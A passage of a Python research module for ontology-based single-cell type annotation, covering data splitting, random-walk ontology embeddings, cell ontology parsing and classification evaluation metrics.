return np.dot(A_mA, B_mB.T) / np.sqrt(np.dot(ssA[:, None],ssB[None]))\n\n\ndef extract_data_based_on_class(feats, labels, sel_labels):\n\tind = []\n\tfor l in sel_labels:\n\t\tid = np.where(labels == l)[0]\n\t\tind.extend(id)\n\tnp.random.shuffle(ind)\n\tX = feats[ind,:]\n\tY = labels[ind]\n\treturn X, Y, ind\n\n\ndef SplitTrainTest(all_X, all_Y, all_tissues = None, random_state=10, nfold_cls = 0.3, nfold_sample = 0.2, nmin_size=10, memory_saving_mode=False):\n\t\"\"\"\n\tUtility function for splitting the dataset into a train and test set.\n\tParameters\n\t----------\n\tall_X: all the feature data\n\tall_Y: the corresponding labels\n\n\tReturns\n\t-------\n\tThe labeled training and test sets\n\t\"\"\"\n\tnp.random.seed(random_state)\n\n\tcls = np.unique(all_Y)\n\tcls2ct = Counter(all_Y)\n\tncls = len(cls)\n\ttest_cls = list(np.random.choice(cls, int(ncls * nfold_cls), replace=False))\n\tfor c in cls2ct:\n\t\tif cls2ct[c] < nmin_size:\n\t\t\ttest_cls.append(c)\n\ttest_cls = np.unique(test_cls)\n\t#add rare class to test, since they cannot be split into train and test by using train_test_split(stratify=True)\n\ttrain_cls = [x for x in cls if x not in test_cls]\n\ttrain_cls = np.array(train_cls)\n\ttrain_X, train_Y, train_ind = extract_data_based_on_class(all_X, all_Y, train_cls)\n\ttest_X, test_Y, test_ind = extract_data_based_on_class(all_X, all_Y, test_cls)\n\tif all_tissues is not None:\n\t\ttrain_tissues = all_tissues[train_ind]\n\t\ttest_tissues = all_tissues[test_ind]\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test, train_tissues_train, train_tissues_test = train_test_split(\n\t \ttrain_X, train_Y, train_tissues, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\ttest_tissues = np.concatenate((test_tissues, train_tissues_test))\n\t\ttrain_tissues = train_tissues_train\n\telse:\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test = train_test_split(\n\t \ttrain_X, train_Y, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\n\t# TODO: Added this memory saving mode toggle\n\tif memory_saving_mode:\n\t\ttest_X = scipy.sparse.vstack((test_X, train_X_test))\n\telse:\n\t\ttest_X = np.vstack((test_X, train_X_test))\n\t\n\ttest_Y = np.concatenate((test_Y, train_Y_test))\n\ttrain_X = train_X_train\n\ttrain_Y = train_Y_train\n\tif all_tissues is not None:\n\t\treturn train_X, train_Y, train_tissues, test_X, test_Y, test_tissues\n\telse:\n\t\treturn train_X, train_Y, test_X, test_Y\n\n\ndef LeaveOneOutTrainTest(all_X, all_Y, test_Y, all_tissues = None, random_state=10, nfold_sample = 0.2, nmin_size=10):\n\tnp.random.seed(random_state)\n\n\tcls = np.unique(all_Y)\n\tcls2ct = Counter(all_Y)\n\tncls = len(cls)\n\ttest_cls = [test_Y]\n\ttest_cls = np.unique(test_cls)\n\t#add rare class to test, since they cannot be split into train and test by using train_test_split(stratify=True)\n\ttrain_cls = [x for x in cls if x not in test_cls]\n\ttrain_cls = np.array(train_cls)\n\ttrain_X, train_Y, train_ind = extract_data_based_on_class(all_X, all_Y, train_cls)\n\ttest_X, test_Y, test_ind = extract_data_based_on_class(all_X, all_Y, test_cls)\n\tif all_tissues is not None:\n\t\ttrain_tissues = all_tissues[train_ind]\n\t\ttest_tissues = all_tissues[test_ind]\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test, train_tissues_train, train_tissues_test = train_test_split(\n\t \ttrain_X, train_Y, train_tissues, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\ttest_tissues = np.concatenate((test_tissues, train_tissues_test))\n\t\ttrain_tissues = train_tissues_train\n\telse:\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test = train_test_split(\n\t \ttrain_X, train_Y, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\ttest_X = np.vstack((test_X, train_X_test))\n\ttest_Y = np.concatenate((test_Y, train_Y_test))\n\ttrain_X = train_X_train\n\ttrain_Y = train_Y_train\n\tif all_tissues is not None:\n\t\treturn train_X, train_Y, train_tissues, test_X, test_Y, test_tissues\n\telse:\n\t\treturn train_X, train_Y, test_X, test_Y\n\ndef renorm(X):\n\tY = X.copy()\n\tY = Y.astype(float)\n\tngene,nsample = Y.shape\n\ts = np.sum(Y, axis=0)\n\t#print s.shape()\n\tfor i in range(nsample):\n\t\tif s[i]==0:\n\t\t\ts[i] = 1\n\t\t\tif i < ngene:\n\t\t\t\tY[i,i] = 1\n\t\t\telse:\n\t\t\t\tfor j in range(ngene):\n\t\t\t\t\tY[j,i] = 1. / ngene\n\t\tY[:,i] = Y[:,i]/s[i]\n\treturn Y\n\ndef RandomWalkRestart(A, rst_prob, delta = 1e-4, reset=None, max_iter=50,use_torch=False,return_torch=False):\n\tif use_torch:\n\t\tdevice = torch.device(\"cuda:0\")\n\tnnode = A.shape[0]\n\t#print nnode\n\tif reset is None:\n\t\treset = np.eye(nnode)\n\tnsample,nnode = reset.shape\n\t#print nsample,nnode\n\tP = renorm(A)\n\tP = P.T\n\tnorm_reset = renorm(reset.T)\n\tnorm_reset = norm_reset.T\n\tif use_torch:\n\t\tnorm_reset = torch.from_numpy(norm_reset).float().to(device)\n\t\tP = torch.from_numpy(P).float().to(device)\n\tQ = norm_reset\n\n\tfor i in range(1,max_iter):\n\t\t#Q = gnp.garray(Q)\n\t\t#P = gnp.garray(P)\n\t\tif use_torch:\n\t\t\tQ_new = rst_prob*norm_reset + (1-rst_prob) * torch.mm(Q, P)#.as_numpy_array()\n\t\t\tdelta = torch.norm(Q-Q_new, 2)\n\t\telse:\n\t\t\tQ_new = rst_prob*norm_reset + (1-rst_prob) * np.dot(Q, P)#.as_numpy_array()\n\t\t\tdelta = np.linalg.norm(Q-Q_new, 'fro')\n\t\tQ = Q_new\n\t\t#print (i,Q)\n\t\tsys.stdout.flush()\n\t\tif delta < 1e-4:\n\t\t\tbreak\n\tif use_torch and not return_torch:\n\t\tQ = Q.cpu().numpy()\n\treturn Q\n\ndef DCA_vector(Q, dim):\n\tnnode = Q.shape[0]\n\talpha = 1. / (nnode **2)\n\tQ = np.log(Q + alpha) - np.log(alpha);\n\n\t#Q = Q * Q';\n\t[U, S, V] = svds(Q, dim);\n\tS = np.diag(S)\n\tX = np.dot(U, np.sqrt(S))\n\tY = np.dot(np.sqrt(S), V)\n\tY = np.transpose(Y)\n\treturn X,U,S,V,Y\n\ndef read_cell_ontology_nlp(l2i, ontology_nlp_file, ontology_nlp_emb_file):\n\tncls = len(l2i)\n\tnet = np.zeros((ncls, ncls))\n\tbin_net = np.zeros((ncls, ncls))\n\tfin = open(ontology_nlp_file)\n\tfor line in fin:\n\t\ts,p,wt = line.upper().strip().split('\\t')\n\t\twt = float(wt)\n\t\tnet[l2i[s], l2i[p]] = np.exp(wt)\n\t\tnet[l2i[p], l2i[s]] = np.exp(wt)\n\t\tbin_net[l2i[s], l2i[p]] = 1\n\t\tbin_net[l2i[p], l2i[s]] = 1\n\tfin.close()\n\n\tl2vec = {}\n\tfin = open(ontology_nlp_emb_file)\n\tfor line in fin:\n\t\tw = line.upper().strip().split('\\t')\n\t\tl2vec[w[0]] = []\n\t\tdim = len(w)-1\n\t\tfor i in range(1,len(w)):\n\t\t\tl2vec[w[0]].append(float(w[i]))\n\tfin.close()\n\n\tl2vec_mat = np.zeros((ncls, dim))\n\tfor l in l2vec:\n\t\tif l.upper() not in l2i:\n\t\t\tcontinue\n\t\tl2vec_mat[l2i[l.upper()],:] = l2vec[l]\n\n\t'''\n\tnet_sum = np.sum(net,axis=0)\n\tfor i in range(ncls):\n\t\tif net_sum[i] == 0:\n\t\t\tnet[i,i] = 1.\n\t\tnet[:,i] /= np.sum(net[:,i])\n\t#net = net / net.sum(axis=1)[:, np.newaxis]\n\t'''\n\treturn net, bin_net, l2vec_mat\n\n\ndef GetReverseNet(onto_net):\n\tonto_net_rev = collections.defaultdict(dict)\n\tfor a in onto_net:\n\t\tfor b in onto_net[a]:\n\t\t\tonto_net_rev[b][a] = 1\n\treturn onto_net_rev\n\n\ndef ParseCLOnto(train_Y, ontology_nlp_file, ontology_file, co_dim=5, co_mi=3, dfs_depth = 1, combine_unseen = False, add_emb_diagonal = True, use_pretrain = None, use_seen_only = True):#\n\tunseen_l, l2i, i2l, train_X2Y, onto_net, onto_net_mat = create_labels(train_Y, ontology_nlp_file, ontology_file, dfs_depth = dfs_depth, combine_unseen = combine_unseen)\n\tY_emb = emb_ontology(i2l, ontology_nlp_file, ontology_file, dim = co_dim, mi=co_mi, use_pretrain = use_pretrain, use_seen_only = True, unseen_l = unseen_l)\n\tif add_emb_diagonal:\n\t\tY_emb = np.column_stack((np.eye(len(i2l)), Y_emb))\n\treturn unseen_l, l2i, i2l, onto_net, Y_emb, onto_net_mat\n\n\n\ndef graph_embedding(A, i2l, mi=0, dim=20,use_seen_only=True,unseen_l=None):\n\tnl = np.shape(A)[0]\n\tif use_seen_only:\n\t\tseen_ind = []\n\t\tunseen_ind = []\n\t\tfor i in range(nl):\n\t\t\tif i2l[i] in unseen_l:\n\t\t\t\tunseen_ind.append(i)\n\t\t\telse:\n\t\t\t\tseen_ind.append(i)\n\t\tseen_ind = np.array(seen_ind)\n\t\tunseen_ind = np.array(unseen_ind)\n\n\t#if len(seen_ind) * 0.8 < dim:\n\t#\tdim = int(len(seen_ind) * 0.8)\n\tif mi==0 or mi == 1:\n\t\tsp = graph_shortest_path(A,method='FW',directed =False)\n\telse:\n\t\tsp = RandomWalkRestart(A, 0.8)\n\tif use_seen_only:\n\t\tsp = sp[seen_ind, :]\n\t\tsp = sp[:,seen_ind]\n\tX = np.zeros((np.shape(sp)[0],dim))\n\tsvd_dim = min(dim, np.shape(sp)[0]-1)\n\tif mi==0 or mi == 2:\n\t\tX[:,:svd_dim] = svd_emb(sp, dim=svd_dim)\n\telse:\n\t\tX[:,:svd_dim] = DCA_vector(sp, dim=svd_dim)[0]\n\tif use_seen_only:\n\t\tX_ret = np.zeros((nl, dim))\n\t\tX_ret[seen_ind,:] = X\n\telse:\n\t\tX_ret = X\n\tif mi==2 or mi == 3:\n\t\tsp *= -1\n\treturn sp, X_ret\n\ndef cal_ontology_emb(ontology_nlp_file, ontology_file, dim=20, mi=3, use_pretrain = None, use_seen_only = True, unseen_l = None):\n\tif use_pretrain is None or not os.path.isfile(use_pretrain+'X.npy') or not os.path.isfile(use_pretrain+'sp.npy'):\n\t\tcl_nlp = collections.defaultdict(dict)\n\t\tif ontology_nlp_file is not None:\n\t\t\tfin = open(ontology_nlp_file)\n\t\t\tfor line in fin:\n\t\t\t\ts,p,wt = line.upper().strip().split('\\t')\n\t\t\t\tcl_nlp[s][p] = float(wt)\n\t\t\t\tcl_nlp[p][s] = float(wt)\n\t\t\tfin.close()\n\n\t\tfin = open(ontology_file)\n\t\tlset = set()\n\t\ts2p = {}\n\t\tfor line in fin:\n\t\t\tw = line.strip().split('\\t')\n\t\t\ts = w[0]\n\t\t\tp = w[1]\n\t\t\tif len(w)==2:\n\t\t\t\tif p in cl_nlp and s in cl_nlp[p]:\n\t\t\t\t\twt = cl_nlp[p][s]\n\t\t\t\telse:\n\t\t\t\t\twt = 1.\n\t\t\telse:\n\t\t\t\twt = float(w[2])\n\t\t\tif s not in s2p:\n\t\t\t\ts2p[s] = {}\n\t\t\ts2p[s][p] = wt\n\t\t\tlset.add(s)\n\t\t\tlset.add(p)\n\t\tfin.close()\n\t\tlset = np.sort(list(lset))\n\t\tnl = len(lset)\n\t\tl2i = dict(zip(lset, range(nl)))\n\t\ti2l = dict(zip(range(nl), lset))\n\t\tA = np.zeros((nl, nl))\n\t\tfor s in s2p:\n\t\t\tfor p in s2p[s]:\n\t\t\t\tA[l2i[s], l2i[p]] = s2p[s][p]\n\t\t\t\tA[l2i[p], l2i[s]] = s2p[s][p]\n\t\tsp, X = graph_embedding(A, i2l, mi=mi, dim=dim, use_seen_only=use_seen_only, unseen_l=unseen_l)\n\t\tif use_pretrain is not None:\n\t\t\ti2l_file = use_pretrain+'i2l.npy'\n\t\t\tl2i_file = use_pretrain+'l2i.npy'\n\t\t\tX_file = use_pretrain+'X.npy'\n\t\t\tsp_file = use_pretrain+'sp.npy'\n\t\t\tnp.save(X_file, X)\n\t\t\tnp.save(i2l_file, i2l)\n\t\t\tnp.save(l2i_file, l2i)\n\t\t\tnp.save(sp_file, sp)\n\telse:\n\t\ti2l_file = use_pretrain+'i2l.npy'\n\t\tl2i_file = use_pretrain+'l2i.npy'\n\t\tX_file = use_pretrain+'X.npy'\n\t\tsp_file = use_pretrain+'sp.npy'\n\t\tX = np.load(X_file)\n\t\ti2l = np.load(i2l_file,allow_pickle=True).item()\n\t\tl2i = np.load(l2i_file,allow_pickle=True).item()\n\t\tsp = np.load(sp_file,allow_pickle=True)\n\treturn X, l2i, i2l, sp\n\ndef merge_26_datasets(datanames_26datasets, scan_dim = 50):\n\tdatasets, genes_list, n_cells = load_names(datanames_26datasets,verbose=False,log1p=True)\n\tdatasets, genes = merge_datasets(datasets, genes_list)\n\tdatasets_dimred, genes = process_data(datasets, genes, dimred=scan_dim)\n\tdatasets_dimred, expr_datasets = my_assemble(datasets_dimred, ds_names=datanames_26datasets, expr_datasets = datasets, sigma=150)\n\tdatasets_dimred = sparse.vstack(expr_datasets).toarray()\n\treturn datasets_dimred, genes\n\ndef emb_ontology(i2l, ontology_nlp_file, ontology_file, dim=20, mi=0, use_pretrain = None, use_seen_only = True, unseen_l = None):\n\tX, ont_l2i, ont_i2l, A = cal_ontology_emb( ontology_nlp_file, ontology_file, dim=dim, mi=mi, use_pretrain = use_pretrain, use_seen_only = True, unseen_l = unseen_l)\n\n\ti2emb = np.zeros((len(i2l),dim))\n\tnl = len(i2l)\n\tfor i in range(nl):\n\t\tant = i2l[i]\n\t\tif ant not in ont_l2i:\n\t\t\tprint (ant, ont_l2i)\n\t\t\tassert('xxx' in ant.lower() or 'nan' in ant.lower())\n\t\t\tcontinue\n\t\ti2emb[i,:] = X[ont_l2i[ant],:]\n\t'''\n\tAA = np.zeros((nl, nl))\n\tfor i in range(nl):\n\t\tfor j in range(nl):\n\t\t\tanti, antj = i2l[i], i2l[j]\n\t\t\tif anti in ont_l2i and antj in ont_l2i:\n\t\t\t\tAA[i,j] = A[ont_l2i[anti],ont_l2i[antj]]\n\t'''\n\treturn i2emb\n\ndef get_ontology_parents(GO_net, g, dfs_depth=100):\n\tterm_valid = set()\n\tngh_GO = set()\n\tngh_GO.add(g)\n\tdepth = {}\n\tdepth[g] = 0\n\twhile len(ngh_GO) > 0:\n\t\tfor GO in list(ngh_GO):\n\t\t\tfor GO1 in GO_net[GO]:\n\t\t\t\tngh_GO.add(GO1)\n\t\t\t\tdepth[GO1] = depth[GO] + 1\n\t\t\tngh_GO.remove(GO)\n\t\t\tif depth[GO] < dfs_depth:\n\t\t\t\tterm_valid.add(GO)\n\treturn term_valid\n\ndef create_labels(train_Y, ontology_nlp_file, ontology_file, combine_unseen = False, dfs_depth = 1000):\n\n\tfin = open(ontology_file)\n\tlset = set()\n\tfor line in fin:\n\t\ts,p = line.strip().split('\\t')\n\t\tlset.add(s)\n\t\tlset.add(p)\n\tfin.close()\n\n\tseen_l = sorted(np.unique(train_Y))\n\tunseen_l = sorted(lset - set(train_Y))\n\tys = np.concatenate((seen_l, unseen_l))\n\n\ti2l = {}\n\tl2i = {}\n\tfor l in ys:\n\t\tnl = len(i2l)\n\t\tcol = l\n\t\tif combine_unseen and l in unseen_l:\n\t\t\tnl = len(seen_l)\n\t\t\tl2i[col] = nl\n\t\t\ti2l[nl] = col\n\t\t\tcontinue\n\t\tl2i[col] = nl\n\t\ti2l[nl] = col\n\ttrain_Y = [l2i[y] for y in train_Y]\n\ttrain_X2Y = ConvertLabels(train_Y, ncls = len(i2l))\n\tonto_net, onto_net_mat = read_ontology(l2i, ontology_nlp_file, ontology_file, dfs_depth = dfs_depth)\n\treturn unseen_l, l2i, i2l, train_X2Y, onto_net, onto_net_mat\n\ndef query_depth_ontology(net, node, root='cl:0000000'):\n\tdepth = 0\n\twhile node != root:\n\t\tif len(net[node]) == 0:\n\t\t\tprint (node)\n\t\tnode = sorted(list(net[node].keys()))[0]\n\t\tdepth += 1\n\t\tif depth>100:\n\t\t\tsys.error('root not found')\n\treturn depth\n\n\ndef read_ontology(l2i, ontology_nlp_file, ontology_file, dfs_depth = 1000):\n\tnl = len(l2i)\n\tnet = collections.defaultdict(dict)\n\tnet_mat = np.zeros((nl,nl))\n\tfin = open(ontology_file)\n\tfor line in fin:\n\t\ts,p = line.strip().split('\\t')\n\t\tsi = l2i[s]\n\t\tpi = l2i[p]\n\t\tnet[si][pi] = 1\n\t\tnet_mat[si][pi] = 1\n\tfin.close()\n\tfor n in range(nl):\n\t\tngh = get_ontology_parents(net, n, dfs_depth = dfs_depth)\n\t\tnet[n][n] = 1\n\t\tfor n1 in ngh:\n\t\t\tnet[n][n1] = 1\n\treturn net, net_mat\n\ndef extract_label_propagate_tree(onto_net, ncls):\n\ttree = np.zeros((ncls,ncls))\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\ttree[n1,n2] = 1\n\treturn tree\n\ndef ConvertLabels(labels, ncls=-1):\n\tncell = np.shape(labels)[0]\n\tif len(np.shape(labels)) ==1 :\n\t\t#bin to mat\n\t\tif ncls == -1:\n\t\t\tncls = np.max(labels)\n\t\tmat = np.zeros((ncell, ncls))\n\t\tfor i in range(ncell):\n\t\t\tmat[i, labels[i]] = 1\n\t\treturn mat\n\telse:\n\t\tif ncls == -1:\n\t\t\tncls = np.shape(labels)[1]\n\t\tvec = np.zeros(ncell)\n\t\tfor i in range(ncell):\n\t\t\tind = np.where(labels[i,:]!=0)[0]\n\t\t\tassert(len(ind)<=1) # not multlabel classification\n\t\t\tif len(ind)==0:\n\t\t\t\tvec[i] = -1\n\t\t\telse:\n\t\t\t\tvec[i] = ind[0]\n\t\treturn vec\n\ndef MapLabel2CL(test_Y, l2i):\n\t\"\"\"\n\tMaps the label to the cell index\n\t\"\"\"\n\t#for i in range(len(test_Y))\n\t#test_Y_new = np.array([l2i[y] for y in test_Y])\n\t#return test_Y_new\n\ttest_Y_new = []\n\tl2i_set = set(l2i)\n\tcount_NA = 0\n\ttotal = 0\n\tfor y in test_Y:\n\t\ttotal += 1\n\t\tif y not in l2i_set:\n\t\t\tcount_NA += 1\n\t\t\ttest_Y_new.append(-1)\n\t\telse:\n\t\t\ttest_Y_new.append(l2i[y])\n\t#print()\n\t#print(\"Number of 'NA's found in test labels:\", count_NA, \"out of\", total, \"total labels\")\n\treturn np.array(test_Y_new)\n\ndef get_ontology_name(obo_file, lower=True):\n\tfin = open(obo_file)\n\tco2name = {}\n\tname2co = {}\n\ttag_is_syn = {}\n\tfor line in fin:\n\t\tif line.startswith('id: '):\n\t\t\tco = line.strip().split('id: ')[1]\n\t\tif line.startswith('name: '):\n\t\t\tif lower:\n\t\t\t\tname = line.strip().lower().split('name: ')[1]\n\t\t\telse:\n\t\t\t\tname = line.strip().split('name: ')[1]\n\t\t\tco2name[co] = name\n\t\t\tname2co[name] = co\n\t\tif line.startswith('synonym: '):\n\t\t\tif lower:\n\t\t\t\tsyn = line.strip().lower().split('synonym: \"')[1].split('\" ')[0]\n\t\t\telse:\n\t\t\t\tsyn = line.strip().split('synonym: \"')[1].split('\" ')[0]\n\t\t\tif syn in name2co:\n\t\t\t\tcontinue\n\t\t\tname2co[syn] = co\n\tfin.close()\n\treturn co2name, name2co\n\ndef knn_ngh(Y2Y):\n\tind = np.argsort(Y2Y*-1, axis=1)\n\treturn ind\n\ndef extend_prediction_2unseen_normalize(pred_Y_seen, onto_net_rwr, nseen, ratio=200):\n\tsys.exit(-1)#NOT USED\n\tncls = np.shape(onto_net_rwr)[0]\n\tonto_net_rwr = onto_net_rwr - np.tile(np.mean(onto_net_rwr, axis = 1), (ncls, 1))\n\tpred_Y_seen_norm = pred_Y_seen / pred_Y_seen.sum(axis=1)[:, np.newaxis]\n\tpred_Y_all = np.dot(pred_Y_seen_norm, onto_net_rwr[:nseen,:])\n\tpred_Y_all[:,:nseen] = normalize(pred_Y_all[:,:nseen],norm='l1',axis=1)\n\tpred_Y_all[:,nseen:] = normalize(pred_Y_all[:,nseen:],norm='l1',axis=1) * ratio\n\treturn pred_Y_all\n\ndef create_nlp_networks(l2i, onto_net, cls2cls, ontology_nlp_file, ontology_nlp_emb_file):\n\tncls = np.shape(cls2cls)[0]\n\t_, _, onto_nlp_emb = read_cell_ontology_nlp(l2i, ontology_nlp_file = ontology_nlp_file, ontology_nlp_emb_file = ontology_nlp_emb_file)\n\tonto_net_nlp_all_pairs = (cosine_similarity(onto_nlp_emb) + 1 ) /2#1 - spatial.distance.cosine(onto_nlp_emb, onto_nlp_emb)\n\tonto_net_nlp = np.zeros((ncls, ncls))\n\tonto_net_bin = np.zeros((ncls, ncls))\n\tstack_net_bin = np.zeros((ncls, ncls))\n\tstack_net_nlp = np.zeros((ncls, ncls))\n\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\tif n1==n2:\n\t\t\t\tcontinue\n\t\t\tstack_net_nlp[n2,n1] = onto_net_nlp_all_pairs[n2, n1]\n\t\t\tstack_net_nlp[n1,n2] = onto_net_nlp_all_pairs[n1, n2]\n\t\t\tstack_net_bin[n1,n2] = 1\n\t\t\tstack_net_bin[n2,n1] = 1\n\tfor n1 in range(ncls):\n\t\tfor n2 in range(ncls):\n\t\t\tif cls2cls[n1,n2] == 1 or cls2cls[n2,n1] == 1:\n\t\t\t\tonto_net_nlp[n1,n2] = onto_net_nlp_all_pairs[n1, n2]\n\t\t\t\tonto_net_nlp[n2,n1] = onto_net_nlp_all_pairs[n2, n1]\n\t\t\t\tonto_net_bin[n1,n2] = 1\n\t\t\t\tonto_net_bin[n2,n1] = 1\n\treturn onto_net_nlp, onto_net_bin, stack_net_nlp, stack_net_bin, onto_net_nlp_all_pairs\n\n\ndef create_consensus_networks(rsts, onto_net_mat, onto_net_nlp_all_pairs, cls2cls, diss=[2,3], thress=[1,0.8]):\n\tcls2cls_sp = graph_shortest_path(cls2cls,method='FW',directed =False)\n\tncls = np.shape(onto_net_mat)[0]\n\tnetworks = []\n\tfor rst in rsts:\n\t\tfor dis in diss:\n\t\t\tfor thres in thress:\n\t\t\t\tuse_net = np.copy(onto_net_mat)\n\t\t\t\tuse_net[(cls2cls_sp<=dis)&(onto_net_nlp_all_pairs > thres)] = onto_net_nlp_all_pairs[(cls2cls_sp<=dis)&(onto_net_nlp_all_pairs > thres)]\n\t\t\t\tonto_net_rwr = RandomWalkRestart(use_net, rst)\n\t\t\t\tnetworks.append(onto_net_rwr)\n\treturn networks\n\ndef extend_prediction_2unseen(pred_Y_seen, networks, nseen, ratio=200, use_normalize=False):\n\tif not isinstance(networks, list):\n\t\tnetworks = [networks]\n\tpred_Y_all_totoal = 0.\n\tfor onto_net_rwr in networks:\n\t\tif use_normalize:\n\t\t\tonto_net_rwr = onto_net_rwr - np.tile(np.mean(onto_net_rwr, axis = 1), (np.shape(onto_net_rwr)[0], 1))\n\t\tpred_Y_seen_norm = pred_Y_seen / pred_Y_seen.sum(axis=1)[:, np.newaxis]\n\t\tpred_Y_all = np.dot(pred_Y_seen_norm, onto_net_rwr[:nseen,:])\n\t\tpred_Y_all[:,:nseen] = normalize(pred_Y_all[:,:nseen],norm='l1',axis=1)\n\t\tpred_Y_all[:,nseen:] = normalize(pred_Y_all[:,nseen:],norm='l1',axis=1) * ratio\n\t\tpred_Y_all_totoal += pred_Y_all\n\treturn pred_Y_all_totoal\n\ndef my_auprc(y_true, y_pred):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_pred)\n\tarea = auc(recall, precision)\n\treturn area\n\ndef sampled_auprc(truths,preds):\n\tpos = np.where(truths == 1)[0]\n\tneg = np.where(truths == 0)[0]\n\tassert(len(pos) + len(neg) == len(truths))\n\tnneg = len(neg)\n\tnpos = len(pos)\n\tselect_neg = np.random.choice(nneg, npos*3, replace = True)\n\tselect_ind = np.concatenate((pos, select_neg))\n\treturn average_precision_score(truths[select_ind], preds[select_ind])\n\ndef evaluate(Y_pred_mat, Y_truth_vec, unseen_l, nseen, Y_truth_bin_mat = None, Y_pred_vec = None, Y_ind=None, Y_net = None, Y_net_mat = None, write_screen = True, write_to_file = None, combine_unseen = False, prefix='', metrics = ['AUROC(seen)','AUPRC(seen)','AUROC','AUPRC','AUROC(unseen)', 'AUPRC(unseen)','Accuracy@3','Accuracy@5']):\n\t#preprocess scores\n\tunseen_l = np.array(list(unseen_l))\n\tncell,nclass = np.shape(Y_pred_mat)\n\tnseen = nclass - len(unseen_l)\n\tif Y_ind is not None:\n\t\tnon_Y_ind = np.array(list(set(range(nclass)) - set(Y_ind)))\n\t\tif len(non_Y_ind)>0:\n\t\t\tY_pred_mat[:,non_Y_ind] = -1 * np.inf\n\tif Y_pred_vec is None:\n\t\tY_pred_vec = np.argmax(Y_pred_mat, axis=1)\n\tif Y_truth_bin_mat is None:\n\t\tY_truth_bin_mat = ConvertLabels(Y_truth_vec, nclass)\n\n\tY_pred_bin_mat = ConvertLabels(Y_pred_vec, nclass)\n\n\t#class-based metrics\n\tclass_auc_macro = np.full(nclass, np.nan)\n\tclass_auprc_macro = np.full(nclass, np.nan)\n\tclass_f1 = np.full(nclass, np.nan)\n\tfor i in range(nclass):\n\t\tif len(np.unique(Y_truth_bin_mat[:,i]))==2 and np.sum(Y_truth_bin_mat[:,i])>=10:\n\t\t\tclass_auc_macro[i] = roc_auc_score(Y_truth_bin_mat[:,i], Y_pred_mat[:,i])\n\t\t\tclass_auprc_macro[i] = sampled_auprc(Y_truth_bin_mat[:,i], Y_pred_mat[:,i])\n\t\t\tclass_f1[i] = f1_score(Y_truth_bin_mat[:,i], Y_pred_bin_mat[:,i])\n\n\n\t#sample-based metrics\n\textend_acc, extend_Y = extend_accuracy(Y_truth_vec, Y_pred_vec, Y_net, unseen_l)\n\tkappa = cohen_kappa_score(Y_pred_vec, Y_truth_vec)\n\textend_kappa = cohen_kappa_score(extend_Y, Y_truth_vec)\n\taccuracy = accuracy_score(Y_truth_vec, Y_pred_vec)\n\tprec_at_k_3 = precision_at_k(Y_pred_mat, Y_truth_vec, 3)\n\tprec_at_k_5 = precision_at_k(Y_pred_mat, Y_truth_vec, 5)\n\n\t#print ([(x,np.sum(Y_truth_bin_mat[:,unseen_l[i]])) for i,x in enumerate(class_auprc_macro[unseen_l]) if not np.isnan(x)])\n\tseen_auc_macro = np.nanmean(class_auc_macro[:nseen])\n\tseen_auprc_macro = np.nanmean(class_auprc_macro[:nseen])\n\tseen_f1 = np.nanmean(class_f1[:nseen])\n\tif len(unseen_l) == 0:\n\t\tunseen_auc_macro = 0\n\t\tunseen_auprc_macro = 0\n\t\tunseen_f1 = 0\n\telse:\n\t\tunseen_auc_macro = np.nanmean(class_auc_macro[unseen_l])\n\t\t#unseen_auprc_macro = np.nanmean([x for i,x in enumerate(class_auprc_macro[unseen_l]) if np.sum(Y_truth_bin_mat[:,unseen_l[i]])>100])#\n\t\tunseen_auprc_macro = np.nanmean(class_auprc_macro[unseen_l])\n\t\tunseen_f1 = np.nanmean(class_f1[unseen_l])\n\n\tall_v = {'AUROC':np.nanmean(class_auc_macro), 'AUPRC': np.nanmean(class_auprc_macro), 'AUROC(seen)':seen_auc_macro, 'AUPRC(seen)': seen_auprc_macro, 'AUROC(unseen)':unseen_auc_macro, 'AUPRC(unseen)': unseen_auprc_macro, 'Cohens Kappa':extend_kappa, 'Accuracy@3':prec_at_k_3, 'Accuracy@5':prec_at_k_5}\n\tres_v = {}\n\tfor metric in metrics:\n\t\tres_v[metric] = all_v[metric]\n\n\tif write_screen:\n\t\tprint (prefix, end='\\t')\n\t\tfor v in metrics:\n\t\t\tprint ('%.4f'%res_v[v], end='\\t')\n\t\tprint ('')\n\t\tsys.stdout.flush()\n\tif write_to_file is not None:\n\t\twrite_to_file.write(prefix+'\\t')\n\t\tfor v in metrics:\n\t\t\twrite_to_file.write('%.2f\\t'%res_v[v])\n\t\twrite_to_file.write('\\n')\n\t\twrite_to_file.flush()\n\treturn res_v\n\ndef precision_at_k(pred,truth,k):\n\tncell, nclass = np.shape(pred)\n\thit = 0.\n\tfor i in range(ncell):\n\t\tx = np.argsort(pred[i,:]*-1)\n\t\trank = np.where(x==truth[i])[0][0]\n\t\tif rank < k:\n\t\t\thit += 1.\n\tprec = hit / ncell\n\treturn prec\n\ndef write_anndata_data(test_label, test_AnnData, cl_obo_file, label_name):\n\tif len(np.shape(test_label))==2:\n\t\ttest_label = np.argmax(test_label, axis = 1)\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\tx = test_AnnData\n\tncell = np.shape(x.X)[0]\n\tprint (ncell, len(test_label))\n\tassert(ncell == len(test_label))\n\ttest_name = []\n\ttest_label_id = []\n\tfor i in range(ncell):\n\t\txx = i2tp[test_label[i]]\n\t\ttest_label_id.append(xx)\n\t\ttest_name.append(co2name[xx])\n\ttest_name = np.array(test_name)\n\ttest_label_id = np.array(test_label_id)\n\tx.obs['OnClass_annotation_ontology_ID'] = test_label\n\tx.obs['OnClass_annotation_ontology_name'] = test_name\n\treturn x\n\n\ndef read_type2genes(g2i, marker_gene,cl_obo_file):\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\n\tc2cnew = {}\n\tc2cnew['cd4+ t cell'] = 'CD4-positive, CXCR3-negative, CCR6-negative, alpha-beta T cell'.lower()\n\tc2cnew['chromaffin cells (enterendocrine)'] = 'chromaffin cell'.lower()\n\n\n\tc2cnew['mature NK T 